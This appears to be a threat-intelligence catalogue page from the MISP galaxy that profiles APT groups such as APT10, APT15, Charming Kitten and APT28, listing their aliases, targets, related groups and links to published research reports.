https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html

APT10

menuPass is a threat group that has been active since at least 2006. Individual members of menuPass are known to have acted in association with the Chinese Ministry of State Security’s (MSS) Tianjin State Security Bureau and worked for the Huaying Haitai Science and Technology Development Company.

The tag is: misp-galaxy:threat-actor="APT10"

APT10 is also known as:

  • STONE PANDAD

  • Menupass Team

  • happyyongzi

  • POTASSIUM

  • Red Apollo

  • CVNX

  • HOGFISH

  • Cloud Hopper

  • BRONZE RIVERSIDE

  • ATK41

  • G0045

  • Granite Taurus

  • TA429

APT10 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="menuPass - G0045" with estimative-language:likelihood-probability="likely"

Table 11792. Table References

Links

https://unit42.paloaltonetworks.com/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/

https://www.cfr.org/interactive/cyber-operations/apt-10

https://www.ncsc.gov.uk/content/files/protected_files/article_files/Joint%20report%20on%20publicly%20available%20hacking%20tools%20%28NCSC%29.pdf

https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf

https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html

https://www.eweek.com/security/chinese-nation-state-hackers-target-u.s-in-operation-tradesecret

https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/

https://www.accenture.com/t20180423T055005Z_w/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf

https://www.us-cert.gov/sites/default/files/publications/IR-ALERT-MED-17-093-01C-Intrusions_Affecting_Multiple_Victims_Across_Multiple_Sectors.pdf

https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html

https://www.fbi.gov/news/stories/chinese-hackers-indicted-122018

https://attack.mitre.org/groups/G0045/

https://www.secureworks.com/research/threat-profiles/bronze-riverside

https://unit42.paloaltonetworks.com/atoms/granite-taurus

https://www.mandiant.com/resources/insights/apt-groups

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new

Hellsing

This threat actor uses spear-phishing techniques to compromise diplomatic targets in Southeast Asia, India, and the United States. It also seems to have targeted the APT 30. Possibly uses the same infrastructure as Mirage

The tag is: misp-galaxy:threat-actor="Hellsing"

Table 11793. Table References

Links

https://www.cfr.org/interactive/cyber-operations/hellsing

https://securelist.com/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back/69567/

Night Dragon

The tag is: misp-galaxy:threat-actor="Night Dragon"

Night Dragon is also known as:

  • G0014

Night Dragon has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Night Dragon - G0014" with estimative-language:likelihood-probability="likely"

Table 11794. Table References

Links

https://kc.mcafee.com/corporate/index?page=content&id=KB71150

https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf

https://attack.mitre.org/groups/G0014/

APT15

This threat actor uses phishing techniques to compromise the networks of foreign ministries of European countries for espionage purposes.

The tag is: misp-galaxy:threat-actor="APT15"

APT15 is also known as:

  • VIXEN PANDA

  • Ke3Chang

  • Playful Dragon

  • Metushy

  • Lurid

  • Social Network Team

  • Royal APT

  • BRONZE PALACE

  • BRONZE DAVENPORT

  • BRONZE IDLEWOOD

  • NICKEL

  • G0004

  • Red Vulture

  • Nylon Typhoon

APT15 has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Nylon Typhoon" with estimative-language:likelihood-probability="likely"

Table 11795. Table References

Links

https://www.fireeye.com/blog/threat-research/2014/09/forced-to-adapt-xslcmd-backdoor-now-on-os-x.html

http://arstechnica.com/security/2015/04/elite-cyber-crime-group-strikes-back-after-attack-by-rival-apt-gang/

https://github.com/nccgroup/Royal_APT

https://www.cfr.org/interactive/cyber-operations/mirage

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf

https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/

https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/

https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/

https://attack.mitre.org/groups/G0004/

https://www.secureworks.com/research/threat-profiles/bronze-palace

https://www.mandiant.com/resources/insights/apt-groups

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWMFIi

APT14

PLA Navy Anchor Panda is an adversary that CrowdStrike has tracked extensively over the last year targeting both civilian and military maritime operations in the green/brown water regions primarily in the area of operations of the South Sea Fleet of the PLA Navy. In addition to maritime operations in this region, Anchor Panda also heavily targeted western companies in the US, Germany, Sweden, the UK, and Australia, and other countries involved in maritime satellite systems, aerospace companies, and defense contractors. Not surprisingly, embassies and diplomatic missions in the region, foreign intelligence services, and foreign governments with space programs were also targeted.

The tag is: misp-galaxy:threat-actor="APT14"

APT14 is also known as:

  • ANCHOR PANDA

  • QAZTeam

  • ALUMINUM

APT14 has relationships with:

  • uses: misp-galaxy:rat="Gh0st RAT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="Gh0st Rat" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:rat="PoisonIvy" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="Poison Ivy" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="Torn RAT" with estimative-language:likelihood-probability="likely"

Table 11796. Table References

Links

http://www.crowdstrike.com/blog/whois-anchor-panda/

https://www.cfr.org/interactive/cyber-operations/anchor-panda

https://www.mandiant.com/resources/insights/apt-groups

DAGGER PANDA

Operate since at least 2011, from several locations in China, with members in Korea and Japan as well. Possibly linked to Onion Dog. This threat actor targets government institutions, military contractors, maritime and shipbuilding groups, telecommunications operators, and others, primarily in Japan and South Korea.

The tag is: misp-galaxy:threat-actor="DAGGER PANDA"

DAGGER PANDA is also known as:

  • IceFog

  • Trident

  • RedFoxtrot

  • Red Wendigo

  • PLA Unit 69010

Table 11798. Table References

Links

https://securelist.com/the-icefog-apt-a-tale-of-cloak-and-three-daggers/57331/

https://securelist.com/the-icefog-apt-hits-us-targets-with-java-backdoor/58209/

https://www.cfr.org/interactive/cyber-operations/icefog

https://d2538mqrb7brka.cloudfront.net/wp-content/uploads/sites/43/2018/03/20133739/icefog.pdf

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf

APT24

The Pitty Tiger group has been active since at least 2011. They have been seen using HeartBleed vulnerability in order to directly get valid credentials

The tag is: misp-galaxy:threat-actor="APT24"

APT24 is also known as:

  • PITTY PANDA

  • G0011

  • Temp.Pittytiger

APT24 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="PittyTiger - G0011" with estimative-language:likelihood-probability="likely"

Table 11799. Table References

Links

http://blog.airbuscybersecurity.com/post/2014/07/The-Eye-of-the-Tiger2

http://blog.cassidiancybersecurity.com/post/2014/07/The-Eye-of-the-Tiger2

https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2014/2014.07.11.Pitty_Tiger/Pitty_Tiger_Final_Report.pdf

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/targeted-attacks-on-french-company-exploit-multiple-word-vulnerabilities/

https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html

https://attack.mitre.org/groups/G0011

https://www.mandiant.com/resources/insights/apt-groups

Beijing Group

The tag is: misp-galaxy:threat-actor="Beijing Group"

Beijing Group is also known as:

  • SNEAKY PANDA

  • Elderwood

  • Elderwood Gang

  • SIG22

  • G0066

Beijing Group has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Elderwood - G0066" with estimative-language:likelihood-probability="likely"

Table 11801. Table References

Links

https://www.cfr.org/interactive/cyber-operations/sneaky-panda

https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=3b0d679a-3707-4075-a2a9-37d1af16d411&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

https://attack.mitre.org/groups/G0066/

RADIO PANDA

The tag is: misp-galaxy:threat-actor="RADIO PANDA"

RADIO PANDA is also known as:

  • Shrouded Crossbow

SAMURAI PANDA

The tag is: misp-galaxy:threat-actor="SAMURAI PANDA"

SAMURAI PANDA is also known as:

  • PLA Navy

  • Wisp Team

SAMURAI PANDA has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="APT18 - G0026" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="APT18" with estimative-language:likelihood-probability="likely"

Table 11803. Table References

Links

http://www.crowdstrike.com/blog/whois-samurai-panda/

IMPERSONATING PANDA

The tag is: misp-galaxy:threat-actor="IMPERSONATING PANDA"

APT20

We’ve uncovered some new data and likely attribution regarding a series of APT watering hole attacks this past summer. Watering hole attacks are an increasingly popular component of APT campaigns, as many people are more aware of spear phishing and are less likely to open documents or click on links in unsolicited emails. Watering hole attacks offer a much better chance of success because they involve compromising legitimate websites and installing malware intended to compromise website visitors. These are often popular websites frequented by people who work in specific industries or have political sympathies to which the actors want to gain access. In contrast to many other APT campaigns, which tend to rely heavily on spear phishing to gain victims, “th3bug” is known for compromising legitimate websites their intended visitors are likely to frequent. Over the summer they compromised several sites, including a well-known Uyghur website written in that native language.

The tag is: misp-galaxy:threat-actor="APT20"

APT20 is also known as:

  • VIOLIN PANDA

  • TH3Bug

  • Crawling Taurus

Table 11804. Table References

Links

http://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/

https://www.fox-it.com/nl/actueel/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/

https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Aug.10.The_Italian_Connection_An_analysis_of_exploit_supply_chains_and_digital_quartermasters/HTExploitTelemetry.pdf

https://unit42.paloaltonetworks.com/atoms/crawling-taurus/

https://www.mandiant.com/resources/insights/apt-groups

TOXIC PANDA

A group targeting dissident groups in China and at the boundaries.

The tag is: misp-galaxy:threat-actor="TOXIC PANDA"

Table 11805. Table References

Links

https://docs.huihoo.com/rsaconference/usa-2014/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries-final.pdf

TEMPER PANDA

China-based cyber threat group. It has previously used newsworthy events as lures to deliver malware and has primarily targeted organizations involved in financial, economic, and trade policy, typically using publicly available RATs such as PoisonIvy, as well as some non-public backdoors. This threat actor targets prodemocratic activists and organizations in Hong Kong, European and international financial institutions, and a U.S.-based think tank.

The tag is: misp-galaxy:threat-actor="TEMPER PANDA"

TEMPER PANDA is also known as:

  • Admin338

  • Team338

  • MAGNESIUM

  • admin@338

  • G0018

TEMPER PANDA has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="admin@338 - G0018" with estimative-language:likelihood-probability="likely"

Table 11806. Table References

Links

https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html

https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html

https://www.cfr.org/interactive/cyber-operations/admin338

https://attack.mitre.org/groups/G0018/

APT23

TrendMicro described Tropic Trooper in a 2015 report as: 'Taiwan and the Philippines have become the targets of an ongoing campaign called Operation TropicTrooper. Active since 2012, the attackers behind the campaign haveset their sights on the Taiwanese government as well as a number of companies in the heavy industry. The same campaign has also targeted key Philippine military agencies.'

The tag is: misp-galaxy:threat-actor="APT23"

APT23 is also known as:

  • PIRATE PANDA

  • KeyBoy

  • Tropic Trooper

  • BRONZE HOBART

  • G0081

  • Red Orthrus

  • Earth Centaur

Table 11807. Table References

Links

https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/

http://www.crowdstrike.com/blog/rhetoric-foreshadows-cyber-activity-in-the-south-china-sea/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/

http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-tropic-trooper.pdf

https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/

https://unit42.paloaltonetworks.com/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/

https://blog.lookout.com/titan-mobile-threat

https://attack.mitre.org/groups/G0081/

https://www.secureworks.com/research/threat-profiles/bronze-hobart

https://www.mandiant.com/resources/insights/apt-groups

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html

Flying Kitten

Activity: defense and aerospace sectors, also interested in targeting entities in the oil/gas industry.

The tag is: misp-galaxy:threat-actor="Flying Kitten"

Flying Kitten is also known as:

  • SaffronRose

  • Saffron Rose

  • AjaxSecurityTeam

  • Ajax Security Team

  • Group 26

  • Sayad

Flying Kitten has relationships with:

  • similar: misp-galaxy:threat-actor="Rocket Kitten" with estimative-language:likelihood-probability="very-likely"

  • similar: misp-galaxy:mitre-intrusion-set="Magic Hound - G0059" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Charming Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Cleaver" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="OilRig" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Clever Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="CHRYSENE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Cleaver - G0003" with estimative-language:likelihood-probability="likely"

Table 11808. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-operation-saffron-rose.pdf

https://www.crowdstrike.com/blog/cat-scratch-fever-crowdstrike-tracks-newly-reported-iranian-actor-flying-kitten/

https://www.cfr.org/interactive/cyber-operations/saffron-rose

Cutting Kitten

One of the threat actors responsible for the denial of service attacks against U.S in 2012–2013. Three individuals associated with the group—believed to be have been working on behalf of Iran’s Islamic Revolutionary Guard Corps—were indicted by the Justice Department in 2016.

The tag is: misp-galaxy:threat-actor="Cutting Kitten"

Cutting Kitten is also known as:

  • ITsecTeam

Table 11809. Table References

Links

https://www.cfr.org/interactive/cyber-operations/itsecteam

https://www.justice.gov/usao-sdny/file/835061/download

Charming Kitten

Charming Kitten (aka Parastoo, aka Newscaster) is an group with a suspected nexus to Iran that targets organizations involved in government, defense technology, military, and diplomacy sectors.

The tag is: misp-galaxy:threat-actor="Charming Kitten"

Charming Kitten is also known as:

  • Newscaster

  • Parastoo

  • iKittens

  • Group 83

  • NewsBeef

  • G0058

  • CharmingCypress

Charming Kitten has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Magic Hound - G0059" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Flying Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Rocket Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Cleaver" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="OilRig" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Clever Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="CHRYSENE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Cleaver - G0003" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Mint Sandstorm" with estimative-language:likelihood-probability="likely"

Table 11810. Table References

Links

https://en.wikipedia.org/wiki/Operation_Newscaster

https://iranthreats.github.io/resources/macdownloader-macos-malware/

https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2014/2014.05.28.NewsCaster_An_Iranian_Threat_Within_Social_Networks/file-2581720763-pdf.pdf

https://www.forbes.com/sites/thomasbrewster/2017/07/27/iran-hackers-oilrig-use-fake-personas-on-facebook-linkedin-for-cyberespionage/

https://cryptome.org/2012/11/parastoo-hacks-iaea.htm

https://securelist.com/files/2017/03/Report_Shamoon_StoneDrill_final.pdf

https://securelist.com/blog/software/74503/freezer-paper-around-free-meat/

https://www.verfassungsschutz.de/download/broschuere-2016-10-bfv-cyber-brief-2016-04.pdf

https://www.cfr.org/interactive/cyber-operations/newscaster

https://www.washingtontimes.com/news/2014/may/29/iranian-hackers-sucker-punch-us-defense-heads-crea/

https://securelist.com/freezer-paper-around-free-meat/74503/

https://www.scmagazine.com/home/security-news/cybercrime/hbo-breach-accomplished-with-hard-work-by-hacker-poor-security-practices-by-victim/

http://www.arabnews.com/node/1195681/media

https://cyware.com/news/iranian-apt-charming-kitten-impersonates-clearsky-the-security-firm-that-uncovered-its-campaigns-7fea0b4f

https://blog.certfa.com/posts/the-return-of-the-charming-kitten/

https://www.justice.gov/opa/pr/former-us-counterintelligence-agent-charged-espionage-behalf-iran-four-iranians-charged-cyber

https://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/

https://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf

https://attack.mitre.org/groups/G0058/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/

APT33

Our analysis reveals that APT33 is a capable group that has carried out cyber espionage operations since at least 2013. We assess APT33 works at the behest of the Iranian government.

The tag is: misp-galaxy:threat-actor="APT33"

APT33 is also known as:

  • APT 33

  • Elfin

  • MAGNALLIUM

  • Refined Kitten

  • HOLMIUM

  • COBALT TRINITY

  • G0064

  • ATK35

  • Peach Sandstorm

  • TA451

APT33 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="APT33 - G0064" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Peach Sandstorm" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-ics-groups="APT33" with estimative-language:likelihood-probability="almost-certain"

Table 11811. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html

https://blog.trendmicro.com/trendlabs-security-intelligence/more-than-a-dozen-obfuscated-apt33-botnets-used-for-extreme-narrow-targeting/

https://www.brighttalk.com/webcast/10703/275683

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage

https://www.secureworks.com/research/threat-profiles/cobalt-trinity

https://attack.mitre.org/groups/G0064/

https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/

https://www.cfr.org/interactive/cyber-operations/apt-33

https://dragos.com/media/2017-Review-Industrial-Control-System-Threats.pdf

https://dragos.com/adversaries.html

https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/

Magic Kitten

Earliest activity back to November 2008. An established group of cyber attackers based in Iran, who carried on several campaigns in 2013, including a series of attacks targeting political dissidents and those supporting Iranian political opposition.

The tag is: misp-galaxy:threat-actor="Magic Kitten"

Magic Kitten is also known as:

  • Group 42

  • VOYEUR

Table 11812. Table References

Links

https://web.archive.org/web/20161020180305/http://www.scmagazineuk.com/iran-and-russia-blamed-for-state-sponsored-espionage/article/330401/

https://carnegieendowment.org/2018/01/04/iran-s-cyber-ecosystem-who-are-threat-actors-pub-75140

Rocket Kitten

Targets Saudi Arabia, Israel, US, Iran, high ranking defense officials, embassies of various target countries, notable Iran researchers, human rights activists, media and journalists, academic institutions and various scholars, including scientists in the fields of physics and nuclear sciences.

The tag is: misp-galaxy:threat-actor="Rocket Kitten"

Rocket Kitten is also known as:

  • TEMP.Beanie

  • Operation Woolen Goldfish

  • Operation Woolen-Goldfish

  • Thamar Reservoir

  • Timberworm

Rocket Kitten has relationships with:

  • similar: misp-galaxy:threat-actor="Flying Kitten" with estimative-language:likelihood-probability="very-likely"

  • similar: misp-galaxy:mitre-intrusion-set="Magic Hound - G0059" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Charming Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Cleaver" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="OilRig" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Clever Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="CHRYSENE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Cleaver - G0003" with estimative-language:likelihood-probability="likely"

Table 11813. Table References

Links

https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-woolen-goldfish-when-kittens-go-phishing

https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-the-spy-kittens-are-back.pdf

http://www.clearskysec.com/thamar-reservoir/

https://citizenlab.ca/2015/08/iran_two_factor_phishing/

https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf

https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/

https://en.wikipedia.org/wiki/Rocket_Kitten

https://www.cfr.org/interactive/cyber-operations/rocket-kitten

Cleaver

A group of cyber actors utilizing infrastructure located in Iran have been conducting computer network exploitation activity against public and private U.S. organizations, including Cleared Defense Contractors (CDCs), academic institutions, and energy sector companies. This threat actor targets entities in the government, energy, and technology sectors that are located in or do business with Saudi Arabia.

The tag is: misp-galaxy:threat-actor="Cleaver"

Cleaver is also known as:

  • Operation Cleaver

  • Op Cleaver

  • Tarh Andishan

  • Alibaba

  • TG-2889

  • Cobalt Gypsy

  • G0003

Cleaver has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Cleaver - G0003" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Cutting Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="OilRig" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Clever Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="CHRYSENE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Flying Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Charming Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Rocket Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Hazel Sandstorm" with estimative-language:likelihood-probability="likely"

Table 11814. Table References

Links

https://www.secureworks.com/research/the-curious-case-of-mia-ash

https://www.cfr.org/interactive/cyber-operations/operation-cleaver

http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/

https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-woolen-goldfish-when-kittens-go-phishing

https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations

https://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/

https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-the-spy-kittens-are-back.pdf

https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf

https://attack.mitre.org/groups/G0003/

https://xorl.wordpress.com/2021/05/06/iran-cyber-operations-groups/

https://www.secureworks.com/research/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles

https://know.netenrich.com/threatintel/threat_actor/Cutting%20Kitten

https://www.cfr.org/cyber-operations/operation-cleaver

https://securityaffairs.co/wordpress/33682/cyber-crime/ali-baba-apt-middle-east.html

https://scadahacker.com/library/Documents/Cyber_Events/Cylance%20-%20Operation%20Cleaver%20Report.pdf

Sands Casino

The tag is: misp-galaxy:threat-actor="Sands Casino"

Rebel Jackal

This is a pro-Islamist organization that generally conducts attacks motivated by real world events in which its members believe that members of the Muslim faith were wronged. Its attacks generally involve website defacements; however, the group did develop a RAT that it refers to as Fallaga RAT, but which appears to simply be a fork of the njRAT malware popular amongst hackers in the Middle East/North Africa region.

The tag is: misp-galaxy:threat-actor="Rebel Jackal"

Rebel Jackal is also known as:

  • FallagaTeam

Viking Jackal

The tag is: misp-galaxy:threat-actor="Viking Jackal"

Viking Jackal is also known as:

  • Vikingdom

APT28

The Sofacy Group (also known as APT28, Pawn Storm, Fancy Bear and Sednit) is a cyber espionage group believed to have ties to the Russian government. Likely operating since 2007, the group is known to target government, military, and security organizations. It has been characterized as an advanced persistent threat.

The tag is: misp-galaxy:threat-actor="APT28"

APT28 is also known as:

  • Pawn Storm

  • FANCY BEAR

  • Sednit

  • SNAKEMACKEREL

  • Tsar Team

  • TG-4127

  • STRONTIUM

  • Swallowtail

  • IRON TWILIGHT

  • Group 74

  • SIG40

  • Grizzly Steppe

  • G0007

  • ATK5

  • Fighting Ursa

  • ITG05

  • Blue Athena

  • TA422

  • T-APT-12

  • APT-C-20

  • UAC-0028

  • FROZENLAKE

  • Sofacy

  • Forest Blizzard

APT28 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="APT28 - G0007" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="STRONTIUM" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Forest Blizzard" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:360net-threat-actor="奇幻熊 - APT-C-20" with estimative-language:likelihood-probability="likely"

Table 11815. Table References

Links

https://attack.mitre.org/groups/G0007/

https://en.wikipedia.org/wiki/Fancy_Bear

https://en.wikipedia.org/wiki/Sofacy_Group

https://www.bbc.com/news/technology-37590375

https://www.bbc.co.uk/news/technology-45257081

https://www.cfr.org/interactive/cyber-operations/apt-28

https://www.apnews.com/4d174e45ef5843a0ba82e804f080988f

https://www.voanews.com/a/iaaf-hack-fancy-bears/3793874.html

https://securelist.com/a-slice-of-2017-sofacy-activity/83930/

https://www.dw.com/en/hackers-lurking-parliamentarians-told/a-19564630

https://unit42.paloaltonetworks.com/unit42-sofacys-komplex-os-x-trojan/

https://unit42.paloaltonetworks.com/dear-joohn-sofacy-groups-global-campaign/

https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html

https://www2.fireeye.com/rs/848-DID-242/images/wp-mandiant-matryoshka-mining.pdf

https://www.eff.org/deeplinks/2015/08/new-spear-phishing-campaign-pretends-be-eff

https://aptnotes.malwareconfig.com/web/viewer.html?file=../APTnotes/2014/apt28.pdf

https://www.accenture.com/us-en/blogs/blogs-snakemackerel-delivers-zekapab-malware

https://www.wired.com/story/russian-fancy-bears-hackers-release-apparent-ioc-emails/

https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government

https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/

https://unit42.paloaltonetworks.com/unit42-sofacy-attacks-multiple-government-entities/

https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/

https://www.msn.com/en-nz/news/world/russian-hackers-accused-of-targeting-un-chemical-weapons-watchdog-mh17-files/ar-BBNV2ny

https://unit42.paloaltonetworks.com/unit42-new-sofacy-attacks-against-us-government-agency/

https://unit42.paloaltonetworks.com/unit42-let-ride-sofacy-groups-dealerschoice-attacks-continue/

https://www.welivesecurity.com/2018/09/27/lojax-first-uefi-rootkit-found-wild-courtesy-sednit-group/

https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/

https://www.bleepingcomputer.com/news/security/apt28-uses-lojax-first-uefi-rootkit-seen-in-the-wild/

https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-targets-mh17-investigation-team/

https://researchcenter.paloaltonetworks.com/2016/06/unit42-new-sofacy-attacks-against-us-government-agency/

https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf

https://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/

https://blogs.microsoft.com/on-the-issues/2018/08/20/we-are-taking-new-steps-against-broadening-threats-to-democracy/

https://www.lse.co.uk/AllNews.asp?code=kwdwehme&headline=Russian_Hackers_Suspected_In_Cyberattack_On_German_Parliament

https://www.volkskrant.nl/cultuur-media/russen-faalden-bij-hackpogingen-ambtenaren-op-nederlandse-ministeriesb77ff391/

https://www.ibtimes.co.uk/russian-hackers-fancy-bear-likely-breached-olympic-drug-testing-agency-dnc-experts-say-1577508

https://www.bleepingcomputer.com/news/security/microsoft-disrupts-apt28-hacking-campaign-aimed-at-us-midterm-elections/

